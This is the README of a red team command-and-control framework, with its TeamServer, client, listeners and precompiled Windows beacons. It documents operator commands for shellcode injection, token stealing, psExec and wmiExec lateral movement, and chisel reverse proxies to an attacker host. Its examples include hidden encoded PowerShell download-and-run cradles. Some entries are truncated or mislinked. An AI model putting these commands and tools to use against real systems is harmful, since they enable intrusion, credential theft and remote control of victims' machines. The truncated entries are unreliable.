maxDcb/C2TeamServer

Exploration C2

What it is

Exploration is a rudimentary red team Command and Control (C2) framework.
This repository contains the TeamServer and the Client.
The release includes the TeamServer and the Client with a preconfigured certificate, as well as the Windows beacons and modules from C2Implant.

wget -q $(wget -q -O - 'https://api.github.com/repos/maxDcb/C2TeamServer/releases/latest' | jq -r '.assets[] | select(.name=="Release.tar.gz").browser_download_url') -O ./C2TeamServer.tar.gz
mkdir C2TeamServer && tar xf C2TeamServer.tar.gz -C C2TeamServer --strip-components 1

Introduction

The TeamServer is a stand-alone application, written in C++, that handles listeners. The client, written in Python, communicates with the TeamServer through gRPC.
Beacons run on the victim host. Each beacon that connects back to the TeamServer opens a new session. This session is used to control the beacon: send commands and receive results.
Listeners and beacons can communicate over TCP, SMB, HTTP, HTTPS and GitHub issues, depending on the situation.


A compiled version of the TeamServer is ready to use in the Releases, with default certificates for gRPC communication and the HTTP listener.

The TeamServer binary is in Release/TeamServer and is launched using:

cd Release/TeamServer  
./TeamServer


The Python Client is in Release/Client and is launched using 'python3 GUI.py':

cd Release/Client
# --dev means the gRPC hostname in the SSL certificate will not be checked
# --ip is the IP address of the TeamServer
python3 GUI.py --ip 127.0.0.0 --port 50051 --dev

TeamServer Listeners

Four types of listeners are available from the TeamServer: HTTP and HTTPS, which start a web server on the given port; TCP, which starts a TCP server on the given port; and GitHub, which uses the issues of a GitHub project such as "maxDcb/C2TeamServer" together with a personal access token (with write access to issues).


Beacons

Windows Beacon

Windows beacons and command modules are compiled separately in another project, but compiled versions are provided in ./Release/Beacons and ./Release/Modules so they can be used directly.


To launch a beacon from ./Release/Beacons, use the following syntax on a Windows machine:

.\BeaconHttp.exe IP_TEAMSERVER PORT_LISTENER http/https
.\BeaconHttp.exe 10.10.52.5 8443 https
.\BeaconHttp.exe 10.10.52.5 80 http

When the beacon is started and connects to the TeamServer, a new session is opened from which you can interact with the beacon.


The Windows beacon primarily uses the Windows API and starts with no module loaded. Modules are loaded at runtime using the "MemoryModule" project to load DLLs sent by the TeamServer to the beacon.


Modules and their descriptions:

loadModule
  Load a module DLL into the memory of the beacon, giving the beacon that capability.
  The DLL is loaded from the given path; if it is not found, the default ../Modules/ path is tried.
  Example:
  - loadModule /tools/PrintWorkingDirectory.dll

assemblyExec
  Execute shellcode in a process (notepad.exe), wait for the end of execution or a timeout (120 sec), and retrieve the output.
  Use -r to use a shellcode file.
  If -e or -d is given, donut is used to create the shellcode.
  Example:
  - assemblyExec -r ./shellcode.bin
  - assemblyExec -e ./program.exe arg1 arg2...
  - assemblyExec -e ./Seatbelt.exe -group=system
  - assemblyExec -d ./test.dll method arg1 arg2...

upload
  Upload a file from the attacker machine to the victim machine.
  Example:
  - upload c:\temp\toto.exe c:\temp\toto.exe

download
  Download a file from the victim machine to the attacker machine.
  Example:
  - download c:\temp\toto.exe c:\temp\toto.exe

run
  Run a new process on the system.
  If the command is a system command, use the syntax 'cmd /c command'.
  The beacon waits for the command to end and returns the output.
  Example:
  - run whoami
  - run cmd /c dir
  - run .\Seatbelt.exe -group=system

script
  -

inject
  Inject shellcode into the process with the given pid. On Linux you must be root or at least have the ptrace capability.
  No output is provided.
  Use -r to use a shellcode file.
  If -e or -d is given, donut is used to create the shellcode.
  If pid is negative, a new process is created for the injection.
  Example:
  - inject -r ./calc.bin 2568
  - inject -e ./beacon.exe pid arg1 arg2
  - inject -d ./calc.dll pid method arg1 arg2

pwd
  PrintWorkingDirectory

cd
  ChangeDirectory

ls
  ListDirectory

ps
  ListProcesses

makeToken
  Create a token from a user name and password and impersonate it.
  Example:
  - makeToken DOMAIN\Username Password

rev2self
  Drop the impersonation of a token created with makeToken.
  Example:
  - rev2self

stealToken
  Steal a token and impersonate it. Administrator privileges are required.
  Example:
  - stealToken pid

coffLoader
  Load a .o COFF file and execute it.
  The COFF entry point takes packed arguments; specify their types as a string of [Z,z,s,i] for wstring, string, short, int.
  Example:
  - coffLoader ./dir.x64.o go Zs c:\ 0
  - coffLoader ./whoami.x64.o

powershell
  Execute a PowerShell command.
  To be sure to get the output of the command do 'cmd

kerberosUseTicket
  Import a Kerberos ticket from a file into the current LUID.
  Example:
  - KerberosUseTicket /tmp/ticket.kirbi

psExec
  Create an exe on an SMB share of the victim and a service that launches this exe as SYSTEM.
  The exe must be a service binary or inject into another process.
  You must have the right Kerberos tickets.
  Example:
  - psExec m3dc.cyber.local /tmp/implant.exe
  - psExec 10.9.20.10 /tmp/implant.exe

wmiExec
  Execute a command through Windows Management Instrumentation (WMI).
  The user has to be an administrator of the remote machine.
  Can be used with credentials or with Kerberos authentication.
  To use Kerberos, the ticket must be in memory (use Rubeus).
  Example:
  - wmiExec -u DOMAIN\Username Password target powershell.exe -nop -w hidden -e SQBFAFgAIAAoACgAbgBlAHcALQBvAGIAagBlAGMAdAAgAE4AZQB0AC4AV
  - wmiExec -k DOMAIN\dc target powershell.exe -nop -w hidden -e SQBFAFgAIAAoACgAbgBlAHcALQBvAGIAagBlAGMAdAAgAE4AZQB0AC4AV

spawnAs
  Launch a new process as another user, with the given credentials.
  Example:
  - spawnAs DOMAIN\Username Password powershell.exe -nop -w hidden -e SQBFAFgAIAAoACgA...
  - spawnAs .\Administrator Password C:\Users\Public\Documents\implant.exe

chisel
  Launch chisel in a thread on the remote server.
  No output is provided.
  Example:
  - chisel status
  - chisel stop pid
  Reverse SOCKS proxy:
  - chisel /tools/chisel.exe client ATTACKING_IP:LISTEN_PORT R:socks
  - On the attacking machine: chisel server -p LISTEN_PORT --reverse
  Remote port forward:
  - chisel /tools/chisel.exe client ATTACKING_IP:LISTEN_PORT R:LOCAL_PORT:TARGET_IP:REMOTE_PORT
  - On the attacking machine: chisel server -p LISTEN_PORT --reverse

tree
  Tree

assemblyExec and inject, which use the Donut project, make it possible to launch EXE and DLL binaries, managed or unmanaged, directly from memory on the remote host.


coffLoader, which uses the COFFLoader project, is used to run COFF files.


Two side projects can be used to deliver the beacons:

Linux Beacon

A very basic Linux beacon, written in Python, can be found here: C2ImplantPy.

Another very basic Linux beacon, written in Nim, can be found here: C2ImplantPy.

Build the TeamServer

Submodules & External Projects:

Build

sudo apt install gcc-mingw-w64
sudo apt install g++-mingw-w64
sudo apt install golang-cfssl
sudo apt install cmake 

pip3 install pycryptodome
pip install conan
pip install grpcio
pip install PyQt5
pip install pyqtdarktheme
pip install protobuf

conan profile detect

git clone https://github.com/maxDcb/C2TeamServer.git
cd C2TeamServer
git submodule update --init

mkdir build
cd build
cmake ..
make -j4

The TeamServer binary is in ./Release/TeamServer and is launched using './TeamServer'.

The Python Client is in ./Release/Client and is launched using 'python3 GUI.py'.
